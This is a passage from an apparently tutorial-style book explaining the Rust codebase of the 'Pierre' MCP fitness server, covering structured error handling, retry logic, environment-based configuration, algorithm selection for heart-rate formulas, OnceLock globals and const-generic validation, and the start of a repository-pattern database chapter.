Self::ResourceAlreadyExists | Self::ResourceLocked =>
crate::constants::http_status::CONFLICT,
// 429 Too Many Requests
Self::RateLimitExceeded | Self::QuotaExceeded =>
crate::constants::http_status::TOO_MANY_REQUESTS,
// 500 Internal Server Error
Self::InternalError
| Self::DatabaseError
| Self::StorageError
| Self::SerializationError =>
crate::constants::http_status::INTERNAL_SERVER_ERROR,
}
}
}
}
Rust Idioms Explained:
-
#[must_use]attribute- Compiler warning if return value is ignored
- Prevents silent errors:
error.http_status();(unused) is a warning
-
pub const fn- Const function- Can be evaluated at compile time
- No heap allocations allowed
- Perfect for simple mappings like this
-
Pattern matching with
|(OR patterns)Self::InvalidInput | Self::MissingRequiredField= match either variant- Cleaner than nested
ifstatements
Reference: Rust Reference - Const Functions
User-Friendly Descriptions
Source: src/errors.rs:140-172
#![allow(unused)]
fn main() {
impl ErrorCode {
/// Get a user-friendly description of this error
#[must_use]
pub const fn description(self) -> &'static str {
match self {
Self::AuthRequired =>
"Authentication is required to access this resource",
Self::AuthInvalid =>
"The provided authentication credentials are invalid",
Self::RateLimitExceeded =>
"Rate limit exceeded. Please slow down your requests",
Self::ResourceNotFound =>
"The requested resource was not found",
// ... more descriptions
}
}
}
}
Return type: &'static str - String slice with 'static lifetime
- Lives for entire program duration
- No heap allocation
- Stored in binary’s read-only data section
Error Conversion with From/Into
Rust’s ? operator relies on From trait implementations for automatic error conversion.
Automatic from with #[from]
Source: src/database/errors.rs:86-96
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum DatabaseError {
#[error("Database error: {0}")]
Sqlx(#[from] sqlx::Error), // ← Generates From impl automatically
}
}
Error Propagation Chain
#![allow(unused)]
fn main() {
// Example: Error propagates through multiple layers
// Layer 1: Database operation
async fn get_user_from_db(id: &str) -> Result<User, DatabaseError> {
let row = sqlx::query!("SELECT * FROM users WHERE id = ?", id)
.fetch_one(&pool)
.await?; // sqlx::Error → DatabaseError::Sqlx
Ok(user_from_row(row))
}
// Layer 2: Service operation
async fn fetch_user(id: &str) -> Result<User, AppError> {
let user = get_user_from_db(id)
.await?; // DatabaseError → AppError::Database
Ok(user)
}
// Layer 3: HTTP handler
async fn user_endpoint(id: String) -> impl IntoResponse {
match fetch_user(&id).await {
Ok(user) => (StatusCode::OK, Json(user)),
Err(app_error) => {
let status = app_error.http_status();
let body = app_error.to_json();
(status, Json(body))
}
}
}
}
Rust Idioms Explained:
?operator propagation- Converts error types automatically via
Fromimplementations - Early return on
Errvariant - Equivalent to manual
match:
- Converts error types automatically via
#![allow(unused)]
fn main() {
// These are equivalent:
let user = get_user_from_db(id).await?;
// Desugared version:
let user = match get_user_from_db(id).await {
Ok(val) => val,
Err(e) => return Err(e.into()), // ← Calls From::from
};
}
- Error wrapping hierarchy
- Low-level errors (sqlx::Error) → Domain errors (DatabaseError)
- Domain errors → Application errors (AppError)
- Application errors → HTTP responses
Reference: Rust Book - Error Propagation
Provider Error with Retry Logic
Provider errors include retry information for transient failures.
Source: src/providers/errors.rs:10-101
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum ProviderError {
/// Provider API is unavailable or returning errors
#[error("Provider {provider} API error: {status_code} - {message}")]
ApiError {
provider: String,
status_code: u16,
message: String,
retryable: bool,
},
/// Rate limit exceeded with retry information
#[error("Rate limit exceeded for {provider}: retry after {retry_after_secs} seconds")]
RateLimitExceeded {
provider: String,
retry_after_secs: u64,
limit_type: String,
},
// ... more variants
}
impl ProviderError {
/// Check if error is retryable
#[must_use]
pub const fn is_retryable(&self) -> bool {
match self {
Self::ApiError { retryable, .. } => *retryable,
Self::RateLimitExceeded { .. } | Self::NetworkError(_) => true,
Self::AuthenticationFailed { .. }
| Self::NotFound { .. }
| Self::InvalidData { .. } => false,
}
}
/// Get retry delay in seconds if applicable
#[must_use]
pub const fn retry_after_secs(&self) -> Option<u64> {
match self {
Self::RateLimitExceeded { retry_after_secs, .. } =>
Some(*retry_after_secs),
_ => None,
}
}
}
}
Usage in retry logic:
#![allow(unused)]
fn main() {
async fn fetch_with_retry(url: &str) -> Result<Response, ProviderError> {
let mut attempts = 0;
loop {
match fetch(url).await {
Ok(response) => return Ok(response),
Err(e) if e.is_retryable() && attempts < 3 => {
attempts += 1;
if let Some(delay) = e.retry_after_secs() {
tokio::time::sleep(Duration::from_secs(delay)).await;
} else {
// Exponential backoff: 2^attempts seconds
let delay = 2_u64.pow(attempts);
tokio::time::sleep(Duration::from_secs(delay)).await;
}
}
Err(e) => return Err(e), // Non-retryable or max attempts
}
}
}
}
Rust Idioms Explained:
-
Match guards
if e.is_retryable()- Add conditions to match arms
Err(e) if e.is_retryable()only matches retryable errors
-
const fnmethods- Methods callable in const contexts
- No allocations, pure logic only
-
Exponential backoff calculation
2_u64.pow(attempts)calculates 2^n- Underscores in numbers (
2_u64) are for readability
Result Type Aliases
Pierre defines type aliases for cleaner signatures.
Source: src/database/errors.rs:143
#![allow(unused)]
fn main() {
/// Result type for database operations
pub type DatabaseResult<T> = Result<T, DatabaseError>;
}
Source: src/providers/errors.rs:200
#![allow(unused)]
fn main() {
/// Result type for provider operations
pub type ProviderResult<T> = Result<T, ProviderError>;
}
Usage:
#![allow(unused)]
fn main() {
// Without alias
async fn get_user(id: &str) -> Result<User, DatabaseError> { ... }
// With alias (cleaner)
async fn get_user(id: &str) -> DatabaseResult<User> { ... }
}
Rust Idiom: Type aliases reduce boilerplate for commonly-used Result types.
Reference: Rust Book - Type Aliases
Error Handling Patterns
Pattern 1: Map_err for Context
#![allow(unused)]
fn main() {
use crate::database::DatabaseError;
async fn load_config(path: &str) -> DatabaseResult<Config> {
let contents = tokio::fs::read_to_string(path)
.await
.map_err(|e| DatabaseError::InvalidData {
field: "config_file".to_string(),
reason: format!("Failed to read config from {}: {}", path, e),
})?;
let config: Config = serde_json::from_str(&contents)
.map_err(|e| DatabaseError::SerializationError(e))?;
Ok(config)
}
}
Rust Idiom: .map_err(|e| ...) transforms one error type to another, adding context.
Pattern 2: Ok_or for Option → Result
#![allow(unused)]
fn main() {
fn find_user_by_email(email: &str) -> DatabaseResult<User> {
users_cache.get(email)
.ok_or_else(|| DatabaseError::NotFound {
entity_type: "user",
entity_id: email.to_string(),
})
}
}
Rust Idiom: Convert Option<T> to Result<T, E> with custom error.
Pattern 3: And_then for Chaining
#![allow(unused)]
fn main() {
async fn get_user_and_validate(id: &str) -> DatabaseResult<User> {
get_user_from_db(id)
.await
.and_then(|user| {
if user.is_active {
Ok(user)
} else {
Err(DatabaseError::InvalidData {
field: "is_active".to_string(),
reason: "User account is inactive".to_string(),
})
}
})
}
}
Rust Idiom: .and_then() chains operations that can fail, flattening nested Results.
Reference: Rust Book - Result Methods
Diagram: Error Flow
┌─────────────────────────────────────────────────────────────┐
│ HTTP Request │
└──────────────────────┬──────────────────────────────────────┘
│
▼
┌─────────────────────────────┐
│ HTTP Handler (Axum) │
│ Returns: Result<T, AppError>│
└─────────────┬───────────────┘
│ ?
▼
┌─────────────────────────────┐
│ Service Layer │
│ Returns: Result<T, AppError>│
└─────────────┬───────────────┘
│ ?
┌─────────────┼────────────────┐
│ │ │
▼ ▼ ▼
┌────────────────┐ ┌──────────────┐ ┌──────────────┐
│ Database Layer │ │Provider Layer│ │ Other Layers │
│DatabaseError │ │ProviderError │ │ProtocolError │
└────────┬───────┘ └──────┬───────┘ └──────┬───────┘
│ │ │
│ From impl │ From impl │ From impl
└────────────────┼────────────────┘
│
▼
┌─────────────────────────────┐
│ AppError │
│ (unified application error)│
└─────────────┬───────────────┘
│
▼
┌─────────────────────────────┐
│ HTTP Response │
│ Status Code + JSON Body │
└─────────────────────────────┘
Flow explanation:
- Request enters HTTP handler
- Handler calls service layer (propagates with
?) - Service calls database/provider/protocol layers (propagates with
?) - Domain errors automatically convert to
AppErrorviaFromimplementations AppErrorconverts to HTTP response (status code + JSON body)
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
thiserror::Error derive | Auto-implement Error trait | src/database/errors.rs:10 |
#[error("...")] attribute | Define Display format | src/database/errors.rs:13 |
#[from] attribute | Auto-generate From impl | src/database/errors.rs:88 |
| Enum variants with fields | Structured error context | src/errors.rs:19-85 |
#[must_use] attribute | Warn on unused return | src/errors.rs:89 |
pub const fn | Compile-time functions | src/errors.rs:90 |
| Type aliases | Cleaner Result signatures | src/database/errors.rs:110 |
.map_err() | Error transformation | Throughout codebase |
? operator | Error propagation | Throughout codebase |
References:
Key Takeaways
- Never use
anyhow::anyhow!()in production - Use structured error types - thiserror is the standard - Derive macro for custom errors
- Error hierarchies match domains - DatabaseError, ProviderError, AppError
#[from]enables?operator - Automatic error conversion- Add context to errors - Struct variants with meaningful fields
- HTTP mapping at boundaries - ErrorCode → status codes
- Retry logic in error types - ProviderError includes retry information
Next Chapter
Chapter 3: Configuration Management & Environment Variables - Learn how Pierre uses type-safe configuration with dotenvy, clap, and the algorithm selection system.
Chapter 3: Configuration Management & Environment Variables
Introduction
Production applications require flexible configuration that works across development, staging, and production environments. Pierre uses a multi-layered configuration system:
- Environment variables - Runtime configuration (highest priority)
- Type-safe enums - Compile-time validation of config values
- Default values - Sensible fallbacks for missing configuration
- Algorithm selection - Runtime choice of sports science algorithms
This chapter teaches you how to build configuration systems that are both flexible and type-safe.
Config Module Structure
Pierre’s configuration system is organized into specialized submodules for maintainability:
src/config/
├── mod.rs # Module orchestrator with re-exports
├── types.rs # Core types: LogLevel, Environment, LlmProviderType
├── database.rs # DatabaseUrl, PostgresPoolConfig, BackupConfig
├── oauth.rs # OAuth provider configs, FirebaseConfig
├── api_providers.rs # Strava, Fitbit, Garmin API configs
├── network.rs # HTTP client, SSE, CORS, TLS settings
├── cache.rs # Redis, rate limiting, TTL configs
├── security.rs # Authentication, headers, monitoring
├── logging.rs # PII redaction, log sampling
├── mcp.rs # MCP protocol configuration
├── fitness.rs # Sport types, training zones
├── environment.rs # ServerConfig orchestrator
├── intelligence/ # AI/ML configuration
│ ├── algorithms.rs # Algorithm selection (TSS, MaxHR, FTP, etc.)
│ ├── activity.rs # Activity analysis settings
│ ├── goals.rs # Goal management configuration
│ ├── metrics.rs # Metric thresholds and settings
│ ├── nutrition.rs # Nutrition analysis config
│ ├── performance.rs # Performance prediction settings
│ ├── recommendation.rs # Recommendation engine config
│ ├── sleep_recovery.rs # Sleep/recovery analysis settings
│ └── weather.rs # Weather integration config
├── catalog.rs # Parameter catalog and schemas
├── profiles.rs # User profile configs
├── runtime.rs # Session-scoped overrides
├── validation.rs # Config validation rules
├── vo2_max.rs # VO2max-based calculations
├── admin/ # Admin configuration management
│ ├── manager.rs # Runtime config manager
│ ├── service.rs # Config service layer
│ └── types.rs # Admin config types
└── routes/ # HTTP endpoints for config
├── admin.rs # Admin config endpoints
├── configuration.rs # Config API endpoints
└── fitness.rs # Fitness config endpoints
Key design principles:
- Single responsibility: Each module handles one configuration domain
- Re-exports:
mod.rsre-exports commonly used types for convenience - Hierarchical organization: Related configs grouped in submodules
- Separation of concerns: Routes, types, and logic in separate files
Environment Variables with Dotenvy
Pierre uses dotenvy to load environment variables from .envrc files in development.
.envrc File Pattern
Source: .envrc.example (root directory)
# Database configuration
export DATABASE_URL="sqlite:./data/users.db"
export PIERRE_MASTER_ENCRYPTION_KEY="$(openssl rand -base64 32)"
# Server configuration
export HTTP_PORT=8081
export RUST_LOG=info
export JWT_EXPIRY_HOURS=24
# OAuth provider credentials
export STRAVA_CLIENT_ID=your_client_id
export STRAVA_CLIENT_SECRET=your_client_secret
export STRAVA_REDIRECT_URI=http://localhost:8081/api/oauth/callback/strava
# Algorithm configuration
export PIERRE_MAXHR_ALGORITHM=tanaka
export PIERRE_TSS_ALGORITHM=avg_power
export PIERRE_VDOT_ALGORITHM=daniels
Loading at startup:
Source: src/bin/pierre-mcp-server.rs (implicit via dotenvy)
use crate::errors::AppResult;
#[tokio::main]
async fn main() -> AppResult<()> {
// Load .envrc if present (development only)
dotenvy::dotenv().ok(); // ← Silently ignores if file doesn't exist
// Parse configuration from environment
let config = ServerConfig::from_env()?;
// Rest of initialization...
Ok(())
}
Rust Idioms Explained:
-
.ok()to ignore errors- Converts
Result<T, E>toOption<T> - Discards error (file not found is okay in production)
- Production deployments use real env vars, not files
- Converts
-
dotenvy::dotenv()behavior- Searches for
.envfile in current/parent directories - Loads variables into process environment
- Does NOT override existing env vars (existing take precedence)
- Searches for
Reference: dotenvy crate documentation
Type-Safe Configuration Enums
Pierre uses enums to represent configuration values, gaining compile-time type safety.
Loglevel Enum
Source: src/config/types.rs:11-64
Module Organization Note: The config module was split into specialized submodules. Core types like
LogLevel,Environment, andLlmProviderTypenow live insrc/config/types.rs.
#![allow(unused)]
fn main() {
/// Strongly typed log level configuration
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Default)]
#[serde(rename_all = "lowercase")]
pub enum LogLevel {
/// Error level - only critical errors
Error,
/// Warning level - potential issues
Warn,
/// Info level - normal operational messages (default)
#[default]
Info,
/// Debug level - detailed debugging information
Debug,
/// Trace level - very verbose tracing
Trace,
}
impl LogLevel {
/// Convert to `tracing::Level`
#[must_use]
pub const fn to_tracing_level(&self) -> tracing::Level {
match self {
Self::Error => tracing::Level::ERROR,
Self::Warn => tracing::Level::WARN,
Self::Info => tracing::Level::INFO,
Self::Debug => tracing::Level::DEBUG,
Self::Trace => tracing::Level::TRACE,
}
}
/// Parse from string with fallback
#[must_use]
pub fn from_str_or_default(s: &str) -> Self {
match s.to_lowercase().as_str() {
"error" => Self::Error,
"warn" => Self::Warn,
"debug" => Self::Debug,
"trace" => Self::Trace,
_ => Self::Info, // Default fallback
}
}
}
impl std::fmt::Display for LogLevel {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Error => write!(f, "error"),
Self::Warn => write!(f, "warn"),
Self::Info => write!(f, "info"),
Self::Debug => write!(f, "debug"),
Self::Trace => write!(f, "trace"),
}
}
}
}
Rust Idioms Explained:
-
#[derive(Default)]with#[default]variant- New in Rust 1.62+
- Marks which variant is the default
LogLevel::default()returnsLogLevel::Info
-
#[serde(rename_all = "lowercase")]- Serializes
LogLevel::Erroras"error"(not"Error") - Matches common configuration conventions
- Serializes
-
from_str_or_defaultpattern- Infallible parsing (never panics)
- Returns sensible default for invalid input
- Used throughout Pierre for config parsing
-
Displaytrait implementation- Allows
format!("{}", log_level) - Converts enum back to string for logging
- Allows
Usage example:
#![allow(unused)]
fn main() {
// Parse from environment variable
let log_level = env::var("RUST_LOG")
.map(|s| LogLevel::from_str_or_default(&s))
.unwrap_or_default(); // Falls back to LogLevel::Info
// Convert to tracing level
let tracing_level = log_level.to_tracing_level();
// Use in logger initialization
tracing_subscriber::fmt()
.with_max_level(tracing_level)
.init();
}
Reference: Rust Book - Default Trait
Environment Enum (development vs Production)
Source: src/config/types.rs:66-112
#![allow(unused)]
fn main() {
/// Environment type for security and other configurations
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Default)]
#[serde(rename_all = "lowercase")]
pub enum Environment {
/// Development environment (default)
#[default]
Development,
/// Production environment with stricter security
Production,
/// Testing environment for automated tests
Testing,
}
impl Environment {
/// Parse from string with fallback
#[must_use]
pub fn from_str_or_default(s: &str) -> Self {
match s.to_lowercase().as_str() {
"production" | "prod" => Self::Production,
"testing" | "test" => Self::Testing,
_ => Self::Development, // Default fallback
}
}
/// Check if this is a production environment
#[must_use]
pub const fn is_production(&self) -> bool {
matches!(self, Self::Production)
}
/// Check if this is a development environment
#[must_use]
pub const fn is_development(&self) -> bool {
matches!(self, Self::Development)
}
}
}
Rust Idioms Explained:
-
matches!macro - Pattern matching that returns boolmatches!(value, pattern)→trueif matches,falseotherwise- Const fn compatible (can use in const contexts)
- Cleaner than manual
matchwithtrue/falsearms
-
Multiple patterns with
|"production" | "prod"accepts either string- Allows flexibility in configuration values
-
Helper methods for boolean checks
is_production(),is_development()provide readable API- Enable conditional logic:
if env.is_production() { ... }
Usage example:
#![allow(unused)]
fn main() {
let env = Environment::from_str_or_default(
&env::var("PIERRE_ENV").unwrap_or_default()
);
// Conditional security settings
if env.is_production() {
// Enforce HTTPS
// Enable strict CORS
// Disable debug endpoints
} else {
// Allow HTTP for localhost
// Permissive CORS for development
}
}
Reference: Rust Reference - matches! macro
Database Configuration with Type-Safe Enums
Pierre uses an enum to represent different database types, avoiding string-based type checking.
Source: src/config/database.rs:14-80
#![allow(unused)]
fn main() {
/// Type-safe database configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum DatabaseUrl {
/// SQLite database with file path
SQLite {
path: PathBuf,
},
/// PostgreSQL connection
PostgreSQL {
connection_string: String,
},
/// In-memory SQLite (for testing)
Memory,
}
impl DatabaseUrl {
/// Parse from string with validation
pub fn parse_url(s: &str) -> Result<Self> {
if s.starts_with("sqlite:") {
let path_str = s.strip_prefix("sqlite:").unwrap_or(s);
if path_str == ":memory:" {
Ok(Self::Memory)
} else {
Ok(Self::SQLite {
path: PathBuf::from(path_str),
})
}
} else if s.starts_with("postgresql://") || s.starts_with("postgres://") {
Ok(Self::PostgreSQL {
connection_string: s.to_owned(),
})
} else {
// Fallback: treat as SQLite file path
Ok(Self::SQLite {
path: PathBuf::from(s),
})
}
}
/// Convert to connection string
#[must_use]
pub fn to_connection_string(&self) -> String {
match self {
Self::SQLite { path } => format!("sqlite:{}", path.display()),
Self::PostgreSQL { connection_string } => connection_string.clone(),
Self::Memory => "sqlite::memory:".into(),
}
}
/// Check if this is a SQLite database
#[must_use]
pub const fn is_sqlite(&self) -> bool {
matches!(self, Self::SQLite { .. } | Self::Memory)
}
/// Check if this is a PostgreSQL database
#[must_use]
pub const fn is_postgresql(&self) -> bool {
matches!(self, Self::PostgreSQL { .. })
}
}
}
Rust Idioms Explained:
-
Enum variants with different data
SQLite { path: PathBuf }- struct variant with fieldPostgreSQL { connection_string: String }- different struct variantMemory- unit variant (no data)
-
.strip_prefix()method- Removes prefix from string if present
- Returns
Option<&str>(None if prefix not found) - Safer than manual slicing
-
.into()generic conversion"sqlite::memory:".into()converts&str→String- Type inference determines target type
- Cleaner than explicit
.to_string()or.to_owned()
-
Pattern matching with
..(field wildcards)Self::SQLite { .. }matches any SQLite variant- Ignores field values (don’t care about path here)
Usage example:
#![allow(unused)]
fn main() {
// Parse from environment
let db_url = DatabaseUrl::parse_url(&env::var("DATABASE_URL")?)?;
// Type-specific logic
match db_url {
DatabaseUrl::SQLite { ref path } => {
println!("Using SQLite: {}", path.display());
// SQLite-specific initialization
}
DatabaseUrl::PostgreSQL { ref connection_string } => {
println!("Using PostgreSQL: {}", connection_string);
// PostgreSQL-specific initialization
}
DatabaseUrl::Memory => {
println!("Using in-memory database");
// Test-only configuration
}
}
}
Reference: Rust Book - Enum Variants
Algorithm Selection System
Pierre allows runtime selection of sports science algorithms via environment variables.
Source: src/config/intelligence/algorithms.rs:34-95
#![allow(unused)]
fn main() {
/// Algorithm Selection Configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct AlgorithmConfig {
/// TSS calculation algorithm: `avg_power`, `normalized_power`, or `hybrid`
#[serde(default = "default_tss_algorithm")]
pub tss: String,
/// Max HR estimation algorithm: `fox`, `tanaka`, `nes`, or `gulati`
#[serde(default = "default_maxhr_algorithm")]
pub maxhr: String,
/// FTP estimation algorithm: `20min_test`, `from_vo2max`, `ramp_test`, etc.
#[serde(default = "default_ftp_algorithm")]
pub ftp: String,
/// LTHR estimation algorithm: `from_maxhr`, `from_30min`, etc.
#[serde(default = "default_lthr_algorithm")]
pub lthr: String,
/// VO2max estimation algorithm: `from_vdot`, `cooper_test`, etc.
#[serde(default = "default_vo2max_algorithm")]
pub vo2max: String,
}
/// Default TSS algorithm (`avg_power` for backwards compatibility)
fn default_tss_algorithm() -> String {
"avg_power".to_owned()
}
/// Default Max HR algorithm (tanaka as most accurate)
fn default_maxhr_algorithm() -> String {
"tanaka".to_owned()
}
// ... more defaults
impl Default for AlgorithmConfig {
fn default() -> Self {
Self {
tss: default_tss_algorithm(),
maxhr: default_maxhr_algorithm(),
ftp: default_ftp_algorithm(),
lthr: default_lthr_algorithm(),
vo2max: default_vo2max_algorithm(),
}
}
}
}
Rust Idioms Explained:
-
#[serde(default = "function_name")]attribute- Calls function if field is missing during deserialization
- Function must have signature
fn() -> T - Each field can have different default function
-
Default functions pattern
- Separate function per default value
- Allows documentation of why each default was chosen
- Better than inline values in struct initialization
-
Manual
Defaultimplementation- Calls each default function explicitly
- Could use
#[derive(Default)], but manual gives more control - Ensures consistency between serde defaults and Default trait
Configuration via environment:
# .envrc
export PIERRE_TSS_ALGORITHM=normalized_power
export PIERRE_MAXHR_ALGORITHM=tanaka
export PIERRE_VDOT_ALGORITHM=daniels
Loading algorithm config:
#![allow(unused)]
fn main() {
fn load_algorithm_config() -> AlgorithmConfig {
AlgorithmConfig {
tss: env::var("PIERRE_TSS_ALGORITHM")
.unwrap_or_else(|_| default_tss_algorithm()),
maxhr: env::var("PIERRE_MAXHR_ALGORITHM")
.unwrap_or_else(|_| default_maxhr_algorithm()),
// ... other algorithms
}
}
}
Algorithm dispatch example:
Source: src/intelligence/algorithms/maxhr.rs (conceptual)
#![allow(unused)]
fn main() {
pub fn calculate_max_hr(age: u32, gender: Gender, algorithm: &str) -> u16 {
match algorithm {
"fox" => {
// Fox formula: 220 - age
220 - age as u16
}
"tanaka" => {
// Tanaka formula: 208 - (0.7 × age)
(208.0 - (0.7 * age as f64)) as u16
}
"nes" => {
// Nes formula: 211 - (0.64 × age)
(211.0 - (0.64 * age as f64)) as u16
}
"gulati" if matches!(gender, Gender::Female) => {
// Gulati formula (women): 206 - (0.88 × age)
(206.0 - (0.88 * age as f64)) as u16
}
_ => {
// Default to Tanaka (most accurate for general population)
(208.0 - (0.7 * age as f64)) as u16
}
}
}
}
Benefits of algorithm selection:
- Scientific accuracy: Different formulas for different populations
- Research validation: Can A/B test algorithms
- Backwards compatibility: Can maintain old algorithm while testing new ones
- User customization: Advanced users can choose preferred formulas
Reference: See docs/intelligence-methodology.md for algorithm details
Global Static Configuration with Oncelock
Pierre uses OnceLock for global configuration that’s initialized once at startup.
Source: src/constants/mod.rs (conceptual pattern)
#![allow(unused)]
fn main() {
use std::sync::OnceLock;
/// Global server configuration (initialized once at startup)
static SERVER_CONFIG: OnceLock<ServerConfig> = OnceLock::new();
/// Initialize global configuration (call once at startup)
pub fn init_server_config() -> AppResult<()> {
let config = ServerConfig::from_env()?;
SERVER_CONFIG.set(config)
.map_err(|_| AppError::internal("Config already initialized"))?;
Ok(())
}
/// Get immutable reference to server config (call after init)
pub fn get_server_config() -> &'static ServerConfig {
SERVER_CONFIG.get()
.expect("Server config not initialized - call init_server_config() first")
}
}
Rust Idioms Explained:
-
OnceLock<T>- Thread-safe lazy initialization (Rust 1.70+)- Can be set exactly once
- Returns
&'static Tafter initialization - Replaces older
lazy_static!macro
-
Static lifetime
&'static- Reference valid for entire program duration
- No need to pass config around everywhere
- Can be shared across threads safely
-
Initialization pattern
- Call
init_server_config()once inmain() - All other code calls
get_server_config() - Panics if accessed before initialization (intentional - programming error)
- Call
Usage in binary:
Source: src/bin/pierre-mcp-server.rs:119
#[tokio::main]
async fn main() -> Result<()> {
// Initialize static server configuration
pierre_mcp_server::constants::init_server_config()?;
info!("Static server configuration initialized");
// Rest of application can now use get_server_config()
bootstrap_server(config).await
}
Accessing global config:
#![allow(unused)]
fn main() {
use crate::constants::get_server_config;
fn some_function() -> Result<()> {
let config = get_server_config();
println!("HTTP port: {}", config.http_port);
Ok(())
}
}
When to use global config:
- ✅ Read-only configuration - Never changes after startup
- ✅ Widely used values - Accessed from many modules
- ✅ Performance critical - Avoid passing around large structs
- ❌ Mutable state - Use
Arc<Mutex<T>>or message passing instead - ❌ Request-scoped data - Use function parameters or context structs
Reference: Rust std::sync::OnceLock
Const Generics for Compile-Time Validation
Pierre uses const generics to track validation state at compile time.
Source: src/config/intelligence_config.rs:135-150
#![allow(unused)]
fn main() {
/// Main intelligence configuration container
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct IntelligenceConfig<const VALIDATED: bool = false> {
pub recommendation_engine: RecommendationEngineConfig,
pub performance_analyzer: PerformanceAnalyzerConfig,
pub goal_engine: GoalEngineConfig,
// ... more fields
}
impl IntelligenceConfig<false> {
/// Validate configuration and return validated version
pub fn validate(self) -> Result<IntelligenceConfig<true>, ConfigError> {
// Validate all fields
self.recommendation_engine.validate()?;
self.performance_analyzer.validate()?;
// ... more validation
// Return with VALIDATED = true
Ok(IntelligenceConfig::<true> {
recommendation_engine: self.recommendation_engine,
performance_analyzer: self.performance_analyzer,
// ... copy all fields
})
}
}
// Only validated configs can be used
impl IntelligenceConfig<true> {
pub fn use_in_production(&self) {
// Only callable on validated config
}
}
}
Rust Idioms Explained:
-
Const generic parameter
<const VALIDATED: bool>- Type parameter with a constant value
IntelligenceConfig<false>andIntelligenceConfig<true>are different types- Type system enforces validation
-
Type-state pattern
- Use types to represent state machine states
false= unvalidated,true= validated- Compiler prevents using unvalidated config in production
-
Default const generic
<const VALIDATED: bool = false>IntelligenceConfigwithout generic defaults to<false>- Convenient for API consumers
Usage example:
#![allow(unused)]
fn main() {
// Load config (unvalidated)
let config: IntelligenceConfig<false> = load_from_env();
// This would compile-time error (config is unvalidated):
// config.use_in_production();
// Validate config
let validated_config: IntelligenceConfig<true> = config.validate()?;
// Now we can use it (compile-time enforced)
validated_config.use_in_production();
}
Reference: Rust Book - Const Generics
Diagram: Configuration Layers
┌─────────────────────────────────────────────────────────────┐
│ Configuration Layers │
└─────────────────────────────────────────────────────────────┘
┌─────────────────┐
│ Binary Launch │
└────────┬────────┘
│
▼
┌───────────────────────────┐
│ 1. Load .envrc (dev) │
│ dotenvy::dotenv() │
└───────────┬───────────────┘
│
▼
┌───────────────────────────┐
│ 2. Parse Environment │
│ ServerConfig::from_env()│
└───────────┬───────────────┘
│
▼
┌────────────────────┼────────────────────┐
│ │ │
▼ ▼ ▼
┌─────────────────┐ ┌─────────────────┐ ┌──────────────────┐
│ Type-Safe Enums │ │ Algorithm Config│ │ Database Config │
│ - LogLevel │ │ - TSS variants │ │ - SQLite/Postgres│
│ - Environment │ │ - MaxHR variants│ │ - Type-safe URL │
└─────────────────┘ └─────────────────┘ └──────────────────┘
│ │ │
└────────────────────┼────────────────────┘
│
▼
┌───────────────────────────┐
│ 3. Validate Config │
│ IntelligenceConfig │
│ <VALIDATED = true> │
└───────────┬───────────────┘
│
▼
┌───────────────────────────┐
│ 4. Initialize Global │
│ OnceLock::set(config) │
└───────────┬───────────────┘
│
▼
┌───────────────────────────┐
│ 5. Application Runtime │
│ get_server_config() │
└───────────────────────────┘
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
#[derive(Default)] with #[default] | Mark default enum variant | src/config/environment.rs:21 |
#[serde(rename_all = "...")] | Customize serialization format | src/config/environment.rs:20 |
#[serde(default = "function")] | Custom default per field | src/config/intelligence_config.rs:78 |
matches! macro | Pattern matching to bool | src/config/environment.rs:100 |
.strip_prefix() method | Safe string prefix removal | src/config/environment.rs:151 |
| Enum variants with data | Different data per variant | src/config/environment.rs:128-140 |
OnceLock<T> | Thread-safe lazy static | src/constants/mod.rs |
| Const generics | Compile-time state tracking | src/config/intelligence_config.rs:137 |
References:
Key Takeaways
- Environment variables for flexibility - Runtime configuration without recompilation
- Type-safe enums over strings - Compiler catches configuration errors
from_str_or_defaultpattern - Infallible parsing with sensible defaults- Algorithm selection via env vars - Runtime choice of sports science formulas
OnceLockfor global config - Thread-safe lazy initialization- Const generics for validation - Type-state pattern enforces validation
#[serde(default)]for resilience - Graceful handling of missing fields
Next Chapter
Chapter 4: Dependency Injection with Context Pattern - Learn how Pierre avoids the “AppState” anti-pattern with focused dependency injection contexts.
Database Architecture & Repository Pattern
This chapter explores Pierre’s database architecture using the repository pattern with 13 focused repository traits following SOLID principles.
Repository Pattern Architecture
Pierre uses a repository pattern to provide focused, cohesive interfaces for database operations:
┌────────────────────────────────────────────────────────┐
│ Database (Core) │
│ Provides accessor methods for repositories │
└────────────────────────────────────────────────────────┘
│
┌────────────────┴────────────────┐
│ │
▼ ▼
┌──────────────┐ ┌──────────────┐
│ SQLite │ │ PostgreSQL │
│ Implementation│ │Implementation│
│ │ │ │
│ - Local dev │ │ - Production │
│ - Testing │ │ - Cloud │
│ - Embedded │ │ - Scalable │
└──────────────┘ └──────────────┘
│ │
└───────────────┬───────────────┘
│
┌───────────────┴───────────────┐
│ 13 Repository Traits │
├────────────────────────────────┤
│ • UserRepository │
│ • OAuthTokenRepository │
│ • ApiKeyRepository │
│ • UsageRepository │
│ • A2ARepository │
│ • ProfileRepository │
│ • InsightRepository │
│ • AdminRepository │
│ • TenantRepository │
│ • SecurityRepository │
│ • NotificationRepository │
│ • OAuth2ServerRepository │
│ • FitnessConfigRepository │
└────────────────────────────────┘
Why repository pattern?
The repository pattern follows SOLID principles:
- Single Responsibility: Each repository handles one domain (users, tokens, keys, etc.)
- Interface Segregation: Consumers depend only on the methods they need
- Testability: Mock individual repositories independently
- Maintainability: Changes isolated to specific repositories
Each of the 13 repository traits contains 5-20 cohesive methods for its domain.
Repository Accessor Pattern
The Database struct provides accessor methods that return repository implementations:
Source: src/database/mod.rs:139-230
#![allow(unused)]
fn main() {
impl Database {
/// Get UserRepository for user account management
#[must_use]
pub fn users(&self) -> repositories::UserRepositoryImpl {
repositories::UserRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get OAuthTokenRepository for OAuth token storage
#[must_use]
pub fn oauth_tokens(&self) -> repositories::OAuthTokenRepositoryImpl {
repositories::OAuthTokenRepositoryImpl::new(
